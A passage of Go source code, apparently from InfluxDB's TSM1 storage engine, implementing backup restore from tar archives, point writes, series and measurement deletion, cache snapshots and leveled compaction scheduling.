// overlay reads a tar archive generated by Backup() and adds each file
// from the archive matching basePath to the shard.
// If asNew is true, each file will be installed as a new TSM file even if an
// existing file with the same name in the backup exists.
func (e *Engine) overlay(r io.Reader, basePath string, asNew bool) error {
// Copy files from archive while under lock to prevent reopening.
newFiles, err := func() ([]string, error) {
e.mu.Lock()
defer e.mu.Unlock()
var newFiles []string
tr := tar.NewReader(r)
for {
if fileName, err := e.readFileFromBackup(tr, basePath, asNew); err == io.EOF {
break
} else if err != nil {
return nil, err
} else if fileName != "" {
newFiles = append(newFiles, fileName)
}
}
if err := file.SyncDir(e.path); err != nil {
return nil, err
}
// The filestore will only handle tsm files. Other file types will be ignored.
if err := e.FileStore.Replace(nil, newFiles); err != nil {
return nil, err
}
return newFiles, nil
}()
if err != nil {
return err
}
// Load any new series keys to the index
tsmFiles := make([]TSMFile, 0, len(newFiles))
defer func() {
for _, r := range tsmFiles {
r.Close()
}
}()
ext := fmt.Sprintf(".%s", TmpTSMFileExtension)
for _, f := range newFiles {
// If asNew is true, the files created from readFileFromBackup will be new ones
// having a temp extension.
f = strings.TrimSuffix(f, ext)
if !strings.HasSuffix(f, TSMFileExtension) {
// This isn't a .tsm file.
continue
}
fd, err := os.Open(f)
if err != nil {
return err
}
r, err := NewTSMReader(fd)
if err != nil {
return err
}
tsmFiles = append(tsmFiles, r)
}
// Merge and dedup all the series keys across each reader to reduce
// lock contention on the index.
keys := make([][]byte, 0, 10000)
fieldTypes := make([]influxql.DataType, 0, 10000)
ki := newMergeKeyIterator(tsmFiles, nil)
for ki.Next() {
key, typ := ki.Read()
fieldType := BlockTypeToInfluxQLDataType(typ)
if fieldType == influxql.Unknown {
return fmt.Errorf("unknown block type: %v", typ)
}
keys = append(keys, key)
fieldTypes = append(fieldTypes, fieldType)
if len(keys) == cap(keys) {
// Send batch of keys to the index.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
// Reset buffers.
keys, fieldTypes = keys[:0], fieldTypes[:0]
}
}
if len(keys) > 0 {
// Add remaining partial batch.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
}
return nil
}
// readFileFromBackup copies the next file from the archive into the shard.
// The file is skipped if it does not have a matching shardRelativePath prefix.
// If asNew is true, each file will be installed as a new TSM file even if an
// existing file with the same name in the backup exists.
func (e *Engine) readFileFromBackup(tr *tar.Reader, shardRelativePath string, asNew bool) (string, error) {
// Read next archive file.
hdr, err := tr.Next()
if err != nil {
return "", err
}
if !strings.HasSuffix(hdr.Name, TSMFileExtension) {
// This isn't a .tsm file.
return "", nil
}
filename := filepath.Base(filepath.FromSlash(hdr.Name))
// If this is a directory entry (usually just `index` for tsi), create it an move on.
if hdr.Typeflag == tar.TypeDir {
if err := os.MkdirAll(filepath.Join(e.path, filename), os.FileMode(hdr.Mode).Perm()); err != nil {
return "", err
}
return "", nil
}
if asNew {
filename = e.formatFileName(e.FileStore.NextGeneration(), 1) + "." + TSMFileExtension
}
tmp := fmt.Sprintf("%s.%s", filepath.Join(e.path, filename), TmpTSMFileExtension)
// Create new file on disk.
f, err := os.OpenFile(tmp, os.O_CREATE|os.O_RDWR, 0666)
if err != nil {
return "", err
}
defer f.Close()
// Copy from archive to the file.
if _, err := io.CopyN(f, tr, hdr.Size); err != nil {
return "", err
}
// Sync to disk & close.
if err := f.Sync(); err != nil {
return "", err
}
return tmp, nil
}
// addToIndexFromKey will pull the measurement names, series keys, and field
// names from composite keys, and add them to the database index and measurement
// fields.
func (e *Engine) addToIndexFromKey(keys [][]byte, fieldTypes []influxql.DataType) error {
var field []byte
names := make([][]byte, 0, len(keys))
tags := make([]models.Tags, 0, len(keys))
for i := 0; i < len(keys); i++ {
// Replace tsm key format with index key format.
keys[i], field = SeriesAndFieldFromCompositeKey(keys[i])
name := models.ParseName(keys[i])
mf := e.fieldset.CreateFieldsIfNotExists(name)
if err := mf.CreateFieldIfNotExists(field, fieldTypes[i]); err != nil {
return err
}
names = append(names, name)
tags = append(tags, models.ParseTags(keys[i]))
}
// Build in-memory index, if necessary.
if e.index.Type() == inmem.IndexName {
if err := e.index.InitializeSeries(keys, names, tags); err != nil {
return err
}
} else {
if err := e.index.CreateSeriesListIfNotExists(keys, names, tags); err != nil {
return err
}
}
return nil
}
// WritePoints writes metadata and point data into the engine.
// It returns an error if new points are added to an existing key.
func (e *Engine) WritePoints(points []models.Point) error {
values := make(map[string][]Value, len(points))
var (
keyBuf []byte
baseLen int
seriesErr error
)
for _, p := range points {
keyBuf = append(keyBuf[:0], p.Key()...)
keyBuf = append(keyBuf, keyFieldSeparator...)
baseLen = len(keyBuf)
iter := p.FieldIterator()
t := p.Time().UnixNano()
for iter.Next() {
// Skip fields name "time", they are illegal
if bytes.Equal(iter.FieldKey(), timeBytes) {
continue
}
keyBuf = append(keyBuf[:baseLen], iter.FieldKey()...)
if e.seriesTypeMap != nil {
// Fast-path check to see if the field for the series already exists.
if v, ok := e.seriesTypeMap.Get(keyBuf); !ok {
if typ, err := e.Type(keyBuf); err != nil {
// Field type is unknown, we can try to add it.
} else if typ != iter.Type() {
// Existing type is different from what was passed in, we need to drop
// this write and refresh the series type map.
seriesErr = tsdb.ErrFieldTypeConflict
e.seriesTypeMap.Insert(keyBuf, int(typ))
continue
}
// Doesn't exist, so try to insert
vv, ok := e.seriesTypeMap.Insert(keyBuf, int(iter.Type()))
// We didn't insert and the type that exists isn't what we tried to insert, so
// we have a conflict and must drop this field/series.
if !ok || vv != int(iter.Type()) {
seriesErr = tsdb.ErrFieldTypeConflict
continue
}
} else if v != int(iter.Type()) {
// The series already exists, but with a different type. This is also a type conflict
// and we need to drop this field/series.
seriesErr = tsdb.ErrFieldTypeConflict
continue
}
}
var v Value
switch iter.Type() {
case models.Float:
fv, err := iter.FloatValue()
if err != nil {
return err
}
v = NewFloatValue(t, fv)
case models.Integer:
iv, err := iter.IntegerValue()
if err != nil {
return err
}
v = NewIntegerValue(t, iv)
case models.Unsigned:
iv, err := iter.UnsignedValue()
if err != nil {
return err
}
v = NewUnsignedValue(t, iv)
case models.String:
v = NewStringValue(t, iter.StringValue())
case models.Boolean:
bv, err := iter.BooleanValue()
if err != nil {
return err
}
v = NewBooleanValue(t, bv)
default:
return fmt.Errorf("unknown field type for %s: %s", string(iter.FieldKey()), p.String())
}
values[string(keyBuf)] = append(values[string(keyBuf)], v)
}
}
e.mu.RLock()
defer e.mu.RUnlock()
// first try to write to the cache
if err := e.Cache.WriteMulti(values); err != nil {
return err
}
if e.WALEnabled {
if _, err := e.WAL.WriteMulti(values); err != nil {
return err
}
}
return seriesErr
}
// DeleteSeriesRange removes the values between min and max (inclusive) from all series
func (e *Engine) DeleteSeriesRange(itr tsdb.SeriesIterator, min, max int64) error {
return e.DeleteSeriesRangeWithPredicate(itr, func(name []byte, tags models.Tags) (int64, int64, bool) {
return min, max, true
})
}
// DeleteSeriesRangeWithPredicate removes the values between min and max (inclusive) from all series
// for which predicate() returns true. If predicate() is nil, then all values in range are removed.
func (e *Engine) DeleteSeriesRangeWithPredicate(itr tsdb.SeriesIterator, predicate func(name []byte, tags models.Tags) (int64, int64, bool)) error {
var disableOnce bool
// Ensure that the index does not compact away the measurement or series we're
// going to delete before we're done with them.
if tsiIndex, ok := e.index.(*tsi1.Index); ok {
tsiIndex.DisableCompactions()
defer tsiIndex.EnableCompactions()
tsiIndex.Wait()
fs, err := tsiIndex.RetainFileSet()
if err != nil {
return err
}
defer fs.Release()
}
var (
sz int
min, max int64 = math.MinInt64, math.MaxInt64
// Indicator that the min/max time for the current batch has changed and
// we need to flush the current batch before appending to it.
flushBatch bool
)
// These are reversed from min/max to ensure they are different the first time through.
newMin, newMax := int64(math.MaxInt64), int64(math.MinInt64)
// There is no predicate, so setup newMin/newMax to delete the full time range.
if predicate == nil {
newMin = min
newMax = max
}
batch := make([][]byte, 0, 10000)
for {
elem, err := itr.Next()
if err != nil {
return err
} else if elem == nil {
break
}
// See if the series should be deleted and if so, what range of time.
if predicate != nil {
var shouldDelete bool
newMin, newMax, shouldDelete = predicate(elem.Name(), elem.Tags())
if !shouldDelete {
continue
}
// If the min/max happens to change for the batch, we need to flush
// the current batch and start a new one.
flushBatch = (min != newMin || max != newMax) && len(batch) > 0
}
if elem.Expr() != nil {
if v, ok := elem.Expr().(*influxql.BooleanLiteral); !ok || !v.Val {
return errors.New("fields not supported in WHERE clause during deletion")
}
}
if !disableOnce {
// Disable and abort running compactions so that tombstones added existing tsm
// files don't get removed. This would cause deleted measurements/series to
// re-appear once the compaction completed. We only disable the level compactions
// so that snapshotting does not stop while writing out tombstones. If it is stopped,
// and writing tombstones takes a long time, writes can get rejected due to the cache
// filling up.
e.disableLevelCompactions(true)
defer e.enableLevelCompactions(true)
e.sfile.DisableCompactions()
defer e.sfile.EnableCompactions()
e.sfile.Wait()
disableOnce = true
}
if sz >= deleteFlushThreshold || flushBatch {
// Delete all matching batch.
if err := e.deleteSeriesRange(batch, min, max); err != nil {
return err
}
batch = batch[:0]
sz = 0
flushBatch = false
}
// Use the new min/max time for the next iteration
min = newMin
max = newMax
key := models.MakeKey(elem.Name(), elem.Tags())
sz += len(key)
batch = append(batch, key)
}
if len(batch) > 0 {
// Delete all matching batch.
if err := e.deleteSeriesRange(batch, min, max); err != nil {
return err
}
}
e.index.Rebuild()
return nil
}
// deleteSeriesRange removes the values between min and max (inclusive) from all series. This
// does not update the index or disable compactions. This should mainly be called by DeleteSeriesRange
// and not directly.
func (e *Engine) deleteSeriesRange(seriesKeys [][]byte, min, max int64) error {
if len(seriesKeys) == 0 {
return nil
}
// Min and max time in the engine are slightly different from the query language values.
if min == influxql.MinTime {
min = math.MinInt64
}
if max == influxql.MaxTime {
max = math.MaxInt64
}
var overlapsTimeRangeMinMax bool
var overlapsTimeRangeMinMaxLock sync.Mutex
e.FileStore.Apply(func(r TSMFile) error {
if r.OverlapsTimeRange(min, max) {
overlapsTimeRangeMinMaxLock.Lock()
overlapsTimeRangeMinMax = true
overlapsTimeRangeMinMaxLock.Unlock()
}
return nil
})
if !overlapsTimeRangeMinMax && e.Cache.store.count() > 0 {
overlapsTimeRangeMinMax = true
}
if !overlapsTimeRangeMinMax {
return nil
}
// Ensure keys are sorted since lower layers require them to be.
if !bytesutil.IsSorted(seriesKeys) {
bytesutil.Sort(seriesKeys)
}
// Run the delete on each TSM file in parallel
if err := e.FileStore.Apply(func(r TSMFile) error {
// See if this TSM file contains the keys and time range
minKey, maxKey := seriesKeys[0], seriesKeys[len(seriesKeys)-1]
tsmMin, tsmMax := r.KeyRange()
tsmMin, _ = SeriesAndFieldFromCompositeKey(tsmMin)
tsmMax, _ = SeriesAndFieldFromCompositeKey(tsmMax)
overlaps := bytes.Compare(tsmMin, maxKey) <= 0 && bytes.Compare(tsmMax, minKey) >= 0
if !overlaps || !r.OverlapsTimeRange(min, max) {
return nil
}
// Delete each key we find in the file. We seek to the min key and walk from there.
batch := r.BatchDelete()
n := r.KeyCount()
var j int
for i := r.Seek(minKey); i < n; i++ {
indexKey, _ := r.KeyAt(i)
seriesKey, _ := SeriesAndFieldFromCompositeKey(indexKey)
for j < len(seriesKeys) && bytes.Compare(seriesKeys[j], seriesKey) < 0 {
j++
}
if j >= len(seriesKeys) {
break
}
if bytes.Equal(seriesKeys[j], seriesKey) {
if err := batch.DeleteRange([][]byte{indexKey}, min, max); err != nil {
batch.Rollback()
return err
}
}
}
return batch.Commit()
}); err != nil {
return err
}
// find the keys in the cache and remove them
deleteKeys := make([][]byte, 0, len(seriesKeys))
// ApplySerialEntryFn cannot return an error in this invocation.
_ = e.Cache.ApplyEntryFn(func(k []byte, _ *entry) error {
seriesKey, _ := SeriesAndFieldFromCompositeKey([]byte(k))
// Cache does not walk keys in sorted order, so search the sorted
// series we need to delete to see if any of the cache keys match.
i := bytesutil.SearchBytes(seriesKeys, seriesKey)
if i < len(seriesKeys) && bytes.Equal(seriesKey, seriesKeys[i]) {
// k is the measurement + tags + sep + field
deleteKeys = append(deleteKeys, k)
}
return nil
})
// Sort the series keys because ApplyEntryFn iterates over the keys randomly.
bytesutil.Sort(deleteKeys)
e.Cache.DeleteRange(deleteKeys, min, max)
// delete from the WAL
if e.WALEnabled {
if _, err := e.WAL.DeleteRange(deleteKeys, min, max); err != nil {
return err
}
}
// The series are deleted on disk, but the index may still say they exist.
// Depending on the the min,max time passed in, the series may or not actually
// exists now. To reconcile the index, we walk the series keys that still exists
// on disk and cross out any keys that match the passed in series. Any series
// left in the slice at the end do not exist and can be deleted from the index.
// Note: this is inherently racy if writes are occurring to the same measurement/series are
// being removed. A write could occur and exist in the cache at this point, but we
// would delete it from the index.
minKey := seriesKeys[0]
// Apply runs this func concurrently. The seriesKeys slice is mutated concurrently
// by different goroutines setting positions to nil.
if err := e.FileStore.Apply(func(r TSMFile) error {
n := r.KeyCount()
var j int
// Start from the min deleted key that exists in this file.
for i := r.Seek(minKey); i < n; i++ {
if j >= len(seriesKeys) {
return nil
}
indexKey, _ := r.KeyAt(i)
seriesKey, _ := SeriesAndFieldFromCompositeKey(indexKey)
// Skip over any deleted keys that are less than our tsm key
cmp := bytes.Compare(seriesKeys[j], seriesKey)
for j < len(seriesKeys) && cmp < 0 {
j++
if j >= len(seriesKeys) {
return nil
}
cmp = bytes.Compare(seriesKeys[j], seriesKey)
}
// We've found a matching key, cross it out so we do not remove it from the index.
if j < len(seriesKeys) && cmp == 0 {
seriesKeys[j] = emptyBytes
j++
}
}
return nil
}); err != nil {
return err
}
// The seriesKeys slice is mutated if they are still found in the cache.
cacheKeys := e.Cache.Keys()
for i := 0; i < len(seriesKeys); i++ {
seriesKey := seriesKeys[i]
// Already crossed out
if len(seriesKey) == 0 {
continue
}
j := bytesutil.SearchBytes(cacheKeys, seriesKey)
if j < len(cacheKeys) {
cacheSeriesKey, _ := SeriesAndFieldFromCompositeKey(cacheKeys[j])
if bytes.Equal(seriesKey, cacheSeriesKey) {
seriesKeys[i] = emptyBytes
}
}
}
// Have we deleted all values for the series? If so, we need to remove
// the series from the index.
hasDeleted := false
for _, k := range seriesKeys {
if len(k) > 0 {
hasDeleted = true
break
}
}
if hasDeleted {
buf := make([]byte, 1024) // For use when accessing series file.
ids := tsdb.NewSeriesIDSet()
measurements := make(map[string]struct{}, 1)
for _, k := range seriesKeys {
if len(k) == 0 {
continue // This key was wiped because it shouldn't be removed from index.
}
name, tags := models.ParseKeyBytes(k)
sid := e.sfile.SeriesID(name, tags, buf)
if sid == 0 {
continue
}
// See if this series was found in the cache earlier
i := bytesutil.SearchBytes(deleteKeys, k)
var hasCacheValues bool
// If there are multiple fields, they will have the same prefix. If any field
// has values, then we can't delete it from the index.
for i < len(deleteKeys) && bytes.HasPrefix(deleteKeys[i], k) {
if e.Cache.Values(deleteKeys[i]).Len() > 0 {
hasCacheValues = true
break
}
i++
}
if hasCacheValues {
continue
}
measurements[string(name)] = struct{}{}
// Remove the series from the local index.
if err := e.index.DropSeries(sid, k, false); err != nil {
return err
}
// Add the id to the set of delete ids.
ids.Add(sid)
}
fielsetChanged := false
for k := range measurements {
if dropped, err := e.index.DropMeasurementIfSeriesNotExist([]byte(k)); err != nil {
return err
} else if dropped {
if err := e.cleanupMeasurement([]byte(k)); err != nil {
return err
}
fielsetChanged = true
}
}
if fielsetChanged {
if err := e.fieldset.Save(); err != nil {
return err
}
}
// Remove any series IDs for our set that still exist in other shards.
// We cannot remove these from the series file yet.
if err := e.seriesIDSets.ForEach(func(s *tsdb.SeriesIDSet) {
ids = ids.AndNot(s)
}); err != nil {
return err
}
// Remove the remaining ids from the series file as they no longer exist
// in any shard.
var err error
ids.ForEach(func(id uint64) {
name, tags := e.sfile.Series(id)
if err1 := e.sfile.DeleteSeriesID(id); err1 != nil {
err = err1
return
}
// In the case of the inmem index the series can be removed across
// the global index (all shards).
if index, ok := e.index.(*inmem.ShardIndex); ok {
key := models.MakeKey(name, tags)
if e := index.Index.DropSeriesGlobal(key); e != nil {
err = e
}
}
})
if err != nil {
return err
}
}
return nil
}
func (e *Engine) cleanupMeasurement(name []byte) error {
// A sentinel error message to cause DeleteWithLock to not delete the measurement
abortErr := fmt.Errorf("measurements still exist")
// Under write lock, delete the measurement if we no longer have any data stored for
// the measurement. If data exists, we can't delete the field set yet as there
// were writes to the measurement while we are deleting it.
if err := e.fieldset.DeleteWithLock(string(name), func() error {
encodedName := models.EscapeMeasurement(name)
sep := len(encodedName)
// First scan the cache to see if any series exists for this measurement.
if err := e.Cache.ApplyEntryFn(func(k []byte, _ *entry) error {
if bytes.HasPrefix(k, encodedName) && (k[sep] == ',' || k[sep] == keyFieldSeparator[0]) {
return abortErr
}
return nil
}); err != nil {
return err
}
// Check the filestore.
return e.FileStore.WalkKeys(name, func(k []byte, _ byte) error {
if bytes.HasPrefix(k, encodedName) && (k[sep] == ',' || k[sep] == keyFieldSeparator[0]) {
return abortErr
}
return nil
})
}); err != nil && err != abortErr {
// Something else failed, return it
return err
}
return nil
}
// DeleteMeasurement deletes a measurement and all related series.
func (e *Engine) DeleteMeasurement(name []byte) error {
// Attempt to find the series keys.
indexSet := tsdb.IndexSet{Indexes: []tsdb.Index{e.index}, SeriesFile: e.sfile}
itr, err := indexSet.MeasurementSeriesByExprIterator(name, nil)
if err != nil {
return err
} else if itr == nil {
return nil
}
defer itr.Close()
return e.DeleteSeriesRange(tsdb.NewSeriesIteratorAdapter(e.sfile, itr), math.MinInt64, math.MaxInt64)
}
// ForEachMeasurementName iterates over each measurement name in the engine.
func (e *Engine) ForEachMeasurementName(fn func(name []byte) error) error {
return e.index.ForEachMeasurementName(fn)
}
func (e *Engine) CreateSeriesListIfNotExists(keys, names [][]byte, tagsSlice []models.Tags) error {
return e.index.CreateSeriesListIfNotExists(keys, names, tagsSlice)
}
func (e *Engine) CreateSeriesIfNotExists(key, name []byte, tags models.Tags) error {
return e.index.CreateSeriesIfNotExists(key, name, tags)
}
// WriteTo is not implemented.
func (e *Engine) WriteTo(w io.Writer) (n int64, err error) { panic("not implemented") }
// WriteSnapshot will snapshot the cache and write a new TSM file with its contents, releasing the snapshot when done.
func (e *Engine) WriteSnapshot() (err error) {
// Lock and grab the cache snapshot along with all the closed WAL
// filenames associated with the snapshot
started := time.Now()
log, logEnd := logger.NewOperation(context.TODO(), e.logger, "Cache snapshot", "tsm1_cache_snapshot")
defer func() {
elapsed := time.Since(started)
e.Cache.UpdateCompactTime(elapsed)
if err == nil {
log.Info("Snapshot for path written", zap.String("path", e.path), zap.Duration("duration", elapsed))
}
logEnd()
}()
closedFiles, snapshot, err := func() (segments []string, snapshot *Cache, err error) {
e.mu.Lock()
defer e.mu.Unlock()
if e.WALEnabled {
if err = e.WAL.CloseSegment(); err != nil {
return
}
segments, err = e.WAL.ClosedSegments()
if err != nil {
return
}
}
snapshot, err = e.Cache.Snapshot()
if err != nil {
return
}
return
}()
if err != nil {
return err
}
if snapshot.Size() == 0 {
e.Cache.ClearSnapshot(true)
return nil
}
// The snapshotted cache may have duplicate points and unsorted data. We need to deduplicate
// it before writing the snapshot. This can be very expensive so it's done while we are not
// holding the engine write lock.
dedup := time.Now()
snapshot.Deduplicate()
e.traceLogger.Info("Snapshot for path deduplicated",
zap.String("path", e.path),
zap.Duration("duration", time.Since(dedup)))
return e.writeSnapshotAndCommit(log, closedFiles, snapshot)
}
// CreateSnapshot will create a temp directory that holds
// temporary hardlinks to the underylyng shard files.
func (e *Engine) CreateSnapshot() (string, error) {
if err := e.WriteSnapshot(); err != nil {
return "", err
}
e.mu.RLock()
defer e.mu.RUnlock()
path, err := e.FileStore.CreateSnapshot()
if err != nil {
return "", err
}
// Generate a snapshot of the index.
return path, nil
}
// writeSnapshotAndCommit will write the passed cache to a new TSM file and remove the closed WAL segments.
func (e *Engine) writeSnapshotAndCommit(log *zap.Logger, closedFiles []string, snapshot *Cache) (err error) {
defer func() {
if err != nil {
e.Cache.ClearSnapshot(false)
}
}()
// write the new snapshot files
newFiles, err := e.Compactor.WriteSnapshot(snapshot)
if err != nil {
log.Info("Error writing snapshot from compactor", zap.Error(err))
return err
}
e.mu.RLock()
defer e.mu.RUnlock()
// update the file store with these new files
if err := e.FileStore.Replace(nil, newFiles); err != nil {
log.Info("Error adding new TSM files from snapshot. Removing temp files.", zap.Error(err))
// Remove the new snapshot files. We will try again.
for _, file := range newFiles {
if err := os.Remove(file); err != nil {
log.Info("Unable to remove file", zap.String("path", file), zap.Error(err))
}
}
return err
}
// clear the snapshot from the in-memory cache, then the old WAL files
e.Cache.ClearSnapshot(true)
if e.WALEnabled {
if err := e.WAL.Remove(closedFiles); err != nil {
log.Info("Error removing closed WAL segments", zap.Error(err))
}
}
return nil
}
// compactCache continually checks if the WAL cache should be written to disk.
func (e *Engine) compactCache() {
t := time.NewTicker(time.Second)
defer t.Stop()
for {
e.mu.RLock()
quit := e.snapDone
e.mu.RUnlock()
select {
case <-quit:
return
case <-t.C:
e.Cache.UpdateAge()
if e.ShouldCompactCache(time.Now()) {
start := time.Now()
e.traceLogger.Info("Compacting cache", zap.String("path", e.path))
err := e.WriteSnapshot()
if err != nil && err != errCompactionsDisabled {
e.logger.Info("Error writing snapshot", zap.Error(err))
atomic.AddInt64(&e.stats.CacheCompactionErrors, 1)
} else {
atomic.AddInt64(&e.stats.CacheCompactions, 1)
}
atomic.AddInt64(&e.stats.CacheCompactionDuration, time.Since(start).Nanoseconds())
}
}
}
}
// ShouldCompactCache returns true if the Cache is over its flush threshold
// or if the passed in lastWriteTime is older than the write cold threshold.
func (e *Engine) ShouldCompactCache(t time.Time) bool {
sz := e.Cache.Size()
if sz == 0 {
return false
}
if sz > e.CacheFlushMemorySizeThreshold {
return true
}
return t.Sub(e.Cache.LastWriteTime()) > e.CacheFlushWriteColdDuration
}
func (e *Engine) compact(wg *sync.WaitGroup) {
t := time.NewTicker(time.Second)
defer t.Stop()
for {
e.mu.RLock()
quit := e.done
e.mu.RUnlock()
select {
case <-quit:
return
case <-t.C:
// Find our compaction plans
level1Groups := e.CompactionPlan.PlanLevel(1)
level2Groups := e.CompactionPlan.PlanLevel(2)
level3Groups := e.CompactionPlan.PlanLevel(3)
level4Groups := e.CompactionPlan.Plan(e.LastModified())
atomic.StoreInt64(&e.stats.TSMOptimizeCompactionsQueue, int64(len(level4Groups)))
// If no full compactions are need, see if an optimize is needed
if len(level4Groups) == 0 {
level4Groups = e.CompactionPlan.PlanOptimize()
atomic.StoreInt64(&e.stats.TSMOptimizeCompactionsQueue, int64(len(level4Groups)))
}
// Update the level plan queue stats
atomic.StoreInt64(&e.stats.TSMCompactionsQueue[0], int64(len(level1Groups)))
atomic.StoreInt64(&e.stats.TSMCompactionsQueue[1], int64(len(level2Groups)))
atomic.StoreInt64(&e.stats.TSMCompactionsQueue[2], int64(len(level3Groups)))
// Set the queue depths on the scheduler
e.scheduler.setDepth(1, len(level1Groups))
e.scheduler.setDepth(2, len(level2Groups))
e.scheduler.setDepth(3, len(level3Groups))
e.scheduler.setDepth(4, len(level4Groups))
// Find the next compaction that can run and try to kick it off
if level, runnable := e.scheduler.next(); runnable {
switch level {
case 1:
if e.compactHiPriorityLevel(level1Groups[0], 1, false, wg) {
level1Groups = level1Groups[1:]
}
case 2:
if e.compactHiPriorityLevel(level2Groups[0], 2, false, wg) {
level2Groups = level2Groups[1:]
}
case 3:
if e.compactLoPriorityLevel(level3Groups[0], 3, true, wg) {
level3Groups = level3Groups[1:]
}
case 4:
if e.compactFull(level4Groups[0], wg) {
level4Groups = level4Groups[1:]
}
}
}
// Release all the plans we didn't start.
e.CompactionPlan.Release(level1Groups)
e.CompactionPlan.Release(level2Groups)
e.CompactionPlan.Release(level3Groups)
e.CompactionPlan.Release(level4Groups)
}
}
}
// compactHiPriorityLevel kicks off compactions using the high priority policy. It returns
// true if the compaction was started
func (e *Engine) compactHiPriorityLevel(grp CompactionGroup, level int, fast bool, wg *sync.WaitGroup) bool {
s := e.levelCompactionStrategy(grp, fast, level)
if s == nil {
return false
}
// Try hi priority limiter, otherwise steal a little from the low priority if we can.
if e.compactionLimiter.TryTake() {
atomic.AddInt64(&e.stats.TSMCompactionsActive[level-1], 1)
wg.Add(1)
go func() {
defer wg.Done()
defer atomic.AddInt64(&e.stats.TSMCompactionsActive[level-1], -1)
defer e.compactionLimiter.Release()
s.Apply()
// Release the files in the compaction plan
e.CompactionPlan.Release([]CompactionGroup{s.group})
}()
return true
}
// Return the unused plans
return false
}
// compactLoPriorityLevel kicks off compactions using the lo priority policy. It returns
// the plans that were not able to be started
func (e *Engine) compactLoPriorityLevel(grp CompactionGroup, level int, fast bool, wg *sync.WaitGroup) bool {
s := e.levelCompactionStrategy(grp, fast, level)
if s == nil {
return false
}
// Try the lo priority limiter, otherwise steal a little from the high priority if we can.
if e.compactionLimiter.TryTake() {
atomic.AddInt64(&e.stats.TSMCompactionsActive[level-1], 1)
wg.Add(1)
go func() {
defer wg.Done()
defer atomic.AddInt64(&e.stats.TSMCompactionsActive[level-1], -1)
defer e.compactionLimiter.Release()
s.Apply()
// Release the files in the compaction plan
e.CompactionPlan.Release([]CompactionGroup{s.group})
}()
return true
}
return false
}
// compactFull kicks off full and optimize compactions using the lo priority policy. It returns
// the plans that were not able to be started.
func (e *Engine) compactFull(grp CompactionGroup, wg *sync.WaitGroup) bool {
s := e.fullCompactionStrategy(grp, false)
if s == nil {
return false
}
// Try the lo priority limiter, otherwise steal a little from the high priority if we can.
if e.compactionLimiter.TryTake() {
atomic.AddInt64(&e.stats.TSMFullCompactionsActive, 1)
wg.Add(1)
go func() {
defer wg.Done()
defer atomic.AddInt64(&e.stats.TSMFullCompactionsActive, -1)
defer e.compactionLimiter.Release()
s.Apply()
// Release the files in the compaction plan
e.CompactionPlan.Release([]CompactionGroup{s.group})
}()
return true
}
return false
}
// compactionStrategy holds the details of what to do in a compaction.
type compactionStrategy struct {
group CompactionGroup
fast bool
level int
durationStat *int64
activeStat *int64
successStat *int64
errorStat *int64
logger *zap.Logger
compactor *Compactor
fileStore *FileStore
engine *Engine
}
// Apply concurrently compacts all the groups in a compaction strategy.
func (s *compactionStrategy) Apply() {
start := time.Now()
s.compactGroup()
atomic.AddInt64(s.durationStat, time.Since(start).Nanoseconds())
}
// compactGroup executes the compaction strategy against a single CompactionGroup.
func (s *compactionStrategy) compactGroup() {
group := s.group
log, logEnd := logger.NewOperation(context.TODO(), s.logger, "TSM compaction", "tsm1_compact_group")
defer logEnd()
log.Info("Beginning compaction", zap.Int("tsm1_files_n", len(group)))
for i, f := range group {
log.Info("Compacting file", zap.Int("tsm1_index", i), zap.String("tsm1_file", f))
}
var (
err error
files []string
)
if s.fast {
files, err = s.compactor.CompactFast(group)
} else {
files, err = s.compactor.CompactFull(group)
}
if err != nil {
_, inProgress := err.(errCompactionInProgress)
if err == errCompactionsDisabled || inProgress {
log.Info("Aborted compaction", zap.Error(err))
if _, ok := err.(errCompactionInProgress); ok {
time.Sleep(time.Second)
}
return
}
log.Warn("Error compacting TSM files", zap.Error(err))
// We hit a bad TSM file - rename so the next compaction can proceed.
if _, ok := err.(errBlockRead); ok {
path := err.(errBlockRead).file
log.Info("Renaming a corrupt TSM file due to compaction error", zap.Error(err))
if err := s.fileStore.ReplaceWithCallback([]string{path}, nil, nil); err != nil {
log.Info("Error removing bad TSM file", zap.Error(err))
} else if e := os.Rename(path, path+"."+BadTSMFileExtension); e != nil {
log.Info("Error renaming corrupt TSM file", zap.Error((err)))
}
}
atomic.AddInt64(s.errorStat, 1)
time.Sleep(time.Second)
return
}
if err := s.fileStore.ReplaceWithCallback(group, files, nil); err != nil {
log.Info("Error replacing new TSM files", zap.Error(err))
atomic.AddInt64(s.errorStat, 1)
time.Sleep(time.Second)
// Remove the new snapshot files. We will try again.
for _, file := range files {
if err := os.Remove(file); err != nil {
log.Error("Unable to remove file", zap.String("path", file), zap.Error(err))
}
}
return
}
for i, f := range files {
log.Info("Compacted file", zap.Int("tsm1_index", i), zap.String("tsm1_file", f))
}
log.Info("Finished compacting files",
zap.Int("tsm1_files_n", len(files)))
atomic.AddInt64(s.successStat, 1)
}
// levelCompactionStrategy returns a compactionStrategy for the given level.
// It returns nil if there are no TSM files to compact.
func (e *Engine) levelCompactionStrategy(group CompactionGroup, fast bool, level int) *compactionStrategy {
return &compactionStrategy{
group: group,
logger: e.logger.With(zap.Int("tsm1_level", level), zap.String("tsm1_strategy", "level")),
fileStore: e.FileStore,
compactor: e.Compactor,
fast: fast,
engine: e,
level: level,
activeStat: &e.stats.TSMCompactionsActive[level-1],
successStat: &e.stats.TSMCompactions[level-1],
errorStat: &e.stats.TSMCompactionErrors[level-1],
durationStat: &e.stats.TSMCompactionDuration[level-1],
}
}
// fullCompactionStrategy returns a compactionStrategy for higher level generations of TSM files.
// It returns nil if there are no TSM files to compact.
func (e *Engine) fullCompactionStrategy(group CompactionGroup, optimize bool) *compactionStrategy {
s := &compactionStrategy{
group: group,
logger: e.logger.With(zap.String("tsm1_strategy", "full"), zap.Bool("tsm1_optimize", optimize)),
fileStore: e.FileStore,
compactor: e.Compactor,
fast: optimize,
engine: e,
level: 4,
}
if optimize {
s.activeStat = &e.stats.TSMOptimizeCompactionsActive
s.successStat = &e.stats.TSMOptimizeCompactions
s.errorStat = &e.stats.TSMOptimizeCompactionErrors
s.durationStat = &e.stats.TSMOptimizeCompactionDuration
} else {
s.activeStat = &e.stats.TSMFullCompactionsActive
s.successStat = &e.stats.TSMFullCompactions
s.errorStat = &e.stats.TSMFullCompactionErrors
s.durationStat = &e.stats.TSMFullCompactionDuration
}
return s
}
// reloadCache reads the WAL segment files and loads them into the cache.
func (e *Engine) reloadCache() error {
now := time.Now()
files, err := segmentFileNames(e.WAL.Path())
if err != nil {
return err
}
